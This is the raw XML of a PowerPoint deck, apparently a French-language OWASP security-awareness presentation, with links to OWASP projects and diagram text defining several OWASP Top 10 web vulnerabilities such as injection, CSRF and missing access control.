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notesSlides/notesSlide13.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag22.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide14.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+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7.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.tags+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide19.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/tags/tag2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93" r:id="rId2"/>
    <p:sldId id="325" r:id="rId3"/>
    <p:sldId id="336" r:id="rId4"/>
    <p:sldId id="341" r:id="rId5"/>
    <p:sldId id="315" r:id="rId6"/>
    <p:sldId id="335" r:id="rId7"/>
    <p:sldId id="275" r:id="rId8"/>
    <p:sldId id="306" r:id="rId9"/>
    <p:sldId id="342" r:id="rId10"/>
    <p:sldId id="344" r:id="rId11"/>
    <p:sldId id="333" r:id="rId12"/>
    <p:sldId id="340" r:id="rId13"/>
    <p:sldId id="343" r:id="rId14"/>
    <p:sldId id="338" r:id="rId15"/>
    <p:sldId id="339" r:id="rId16"/>
    <p:sldId id="302" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="312" r:id="rId19"/>
    <p:sldId id="332" r:id="rId20"/>
    <p:sldId id="345" r:id="rId21"/>
    <p:sldId id="334" r:id="rId22"/>
    <p:sldId id="301" r:id="rId23"/>
    <p:sldId id="311" r:id="rId24"/>
  </p:sldIdLst>
  <p:sldSz cx="6858000" cy="9144000" type="screen4x3"/>
  <p:notesSz cx="68834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celyn Aubert" initials="JA" lastIdx="2" clrIdx="0"/>
  <p:cmAuthor id="1" name="moulay.a.belghiti" initials="mab" lastIdx="26" clrIdx="1"/>
  <p:cmAuthor id="2" name="Damien Azambourg" initials="DA"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D6AC"/>
    <a:srgbClr val="D9EAD5"/>
    <a:srgbClr val="D0D9CF"/>
    <a:srgbClr val="4E8542"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF00FF"/>
    <a:srgbClr val="3333FF"/>
    <a:srgbClr val="F9FBFD"/>
    <a:srgbClr val="4F81BD"/>
    <a:srgbClr val="4F5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789" autoAdjust="0"/>
    <p:restoredTop sz="95335" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="-330" y="22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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Education_Presentation" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2"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Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Education_Presentation" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cheat_Sheets" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing3.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www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI"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200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A1 – Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>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2BD590FA-9231-49C0-97E0-217A496C2237}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A4 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Références directes non sécurisées à un objet</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09FCF6D7-DCB3-4316-B5AF-4A79E28A3947}" type="parTrans" cxnId="{BA4D9481-1FA9-4104-AE41-818FA1E75DC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECA2D58B-5985-4D42-8ACF-DA4EEB388D97}" type="sibTrans" cxnId="{BA4D9481-1FA9-4104-AE41-818FA1E75DC7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C03D2B45-045F-419F-9A43-BA3CEAFBC613}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A5 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Mauvaise configuration Sécurité</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2A2FA93-5279-4E69-A1CA-8046392DF8BB}" type="parTrans" cxnId="{84313AD1-D806-4F50-906D-164AF3200717}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D3D0307-BCC6-4666-B008-AB05B3454592}" type="sibTrans" cxnId="{84313AD1-D806-4F50-906D-164AF3200717}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{47E9EF4E-AA7A-42E3-9DB3-FF494FD47A04}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Une faille d'injection, telle l'injection SQL, OS et LDAP, se produit quand une donnée non fiable est envoyée à un interpréteur en tant qu'élément d'une commande ou d'une requête. Les données hostiles de l'attaquant peuvent duper l'interpréteur afin de l'amener à exécuter des commandes fortuites ou accéder à des données non autorisées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{00FA895F-EA9F-49D0-B094-026497ADB1F9}" type="parTrans" cxnId="{E7AF4FA8-50BA-4438-88DC-24520061291C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFBA57D2-1B10-41DD-9593-2DE28EC9DE88}" type="sibTrans" cxnId="{E7AF4FA8-50BA-4438-88DC-24520061291C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14EF3D90-B7BF-472E-9422-7B5778E09D13}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Une référence directe à un objet se produit quand un développeur expose une référence à un objet d'exécution interne, tel un fichier, un dossier, un enregistrement de base de données ou une clé de base de données. Sans un contrôle d'accès ou autre protection, les attaquants peuvent manipuler ces références pour accéder à des données non autorisées</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2F9B48C0-85AA-453B-B650-01AA8ED87AF6}" type="parTrans" cxnId="{4EC8A31B-A603-4169-B3AF-6B7CC5FC3144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{632CD812-98A5-4F26-9F34-EC4F9D15FA07}" type="sibTrans" cxnId="{4EC8A31B-A603-4169-B3AF-6B7CC5FC3144}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2CA751A3-FAC5-4333-8C12-EE4CE8E8AB39}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Une bonne sécurité nécessite de disposer d'une configuration sécurisée définie et déployée pour l'application, contextes, serveur d'application, serveur web, serveur de base de données et la plate-forme. Tous ces paramètres doivent être définis, mis en œuvre et maintenus, car beaucoup ne sont pas livrés sécurisés par défaut. Cela implique de tenir tous les logiciels à jour</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB3ED1EB-ADBC-4177-8BC2-4E567542EC6C}" type="parTrans" cxnId="{CD6092A4-C4DC-45ED-A751-1B3F7A06E9AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2286D90-3029-415D-AE6F-2F380A320E85}" type="sibTrans" cxnId="{CD6092A4-C4DC-45ED-A751-1B3F7A06E9AA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25555832-CE6E-49DC-8853-636E1959542E}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Les composants vulnérables, tels que bibliothèques, contextes et autres modules logiciels fonctionnent presque toujours avec des privilèges maximum. Ainsi, si exploités, ils peuvent causer des pertes de données sérieuses ou une prise de contrôle du serveur. Les applications utilisant ces composants vulnérables peuvent compromettre leurs défenses et permettre une série d'attaques et d'impacts potentiels</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7C354702-E349-4CDA-99AD-1E32BD6F3EC6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A9 - </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Utilisation de composants avec des vulnérabilités connues</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2E7E824-9857-4FA1-8D4C-966BADFFD02E}" type="sibTrans" cxnId="{CCCFD819-1397-40BF-B77A-80238AB85FB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E4FB5F1-8123-4CBF-ABA0-4D9C713C7B8A}" type="parTrans" cxnId="{CCCFD819-1397-40BF-B77A-80238AB85FB6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22A8181F-3DA9-4EBB-9991-856323D70780}" type="sibTrans" cxnId="{D6BA2657-A55D-4DAB-8EE5-B6CD8738C915}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{949AE632-8A31-479F-9DE5-DEB648FA5F47}" type="parTrans" cxnId="{D6BA2657-A55D-4DAB-8EE5-B6CD8738C915}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5A8502D-52C4-4B4A-ACF7-0A37A965A8B6}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Une attaque CSRF (Cross Site </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>Request</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>Forgery</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>) force le navigateur d'une victime authentifiée à envoyer une requête HTTP forgée, comprenant le cookie de session de la victime ainsi que toute autre information automatiquement inclue, à une application web vulnérable. Ceci permet à l'attaquant de forcer le navigateur de la victime à générer des requêtes dont l'application vulnérable pense qu'elles émanent légitimement de la victime</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{09240EC7-522E-4395-8D61-1A972E9AC8FE}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>A7 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>Manque</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>contrôle</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>d’accès</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> au </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>niveau</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" dirty="0" err="1" smtClean="0"/>
            <a:t>fonctionnel</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DC6AC552-EC1D-4C41-BC2A-2A31755C14D6}" type="sibTrans" cxnId="{D12E2220-E3D4-4AD9-8C72-73CD40A20BF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1C6D0C2-4799-4B09-8EDB-71B4CE380B3C}" type="parTrans" cxnId="{D12E2220-E3D4-4AD9-8C72-73CD40A20BF9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F009B1C-CA71-4886-8BD8-1834F3031679}" type="sibTrans" cxnId="{812FD558-0CC1-4C36-B25E-18FCE06EA12D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{19F46D76-A2BD-46B9-94FE-57535FE3C1A8}" type="parTrans" cxnId="{812FD558-0CC1-4C36-B25E-18FCE06EA12D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4FB0F712-7A12-4305-A804-F19DB2A74F1D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="36576" tIns="36576" rIns="36576" bIns="18288"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr algn="just"/>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>Pratiquement toutes les applications web vérifient les droits d'accès au niveau fonctionnel avant de rendre cette fonctionnalité visible dans l'interface utilisateur. Cependant, les applications doivent effectuer les mêmes vérifications de contrôle d'accès sur le serveur lors de l'accès à chaque fonction. Si les demandes ne sont pas vérifiées, les attaquants seront en mesure de forger des demandes afin d'accéder à une fonctionnalité non autorisée</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{983F9778-1966-4F92-9D76-49AED59BA5D1}" type="parTrans" cxnId="{B5311067-92D2-419F-BCCF-525CEFFE4616}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9B9B97E-B4C8-4806-B7B1-0C0989D9A093}" type="sibTrans" cxnId="{B5311067-92D2-419F-BCCF-525CEFFE4616}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{930B7E02-7BD0-4A1A-8B80-F9B89ACD00BA}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
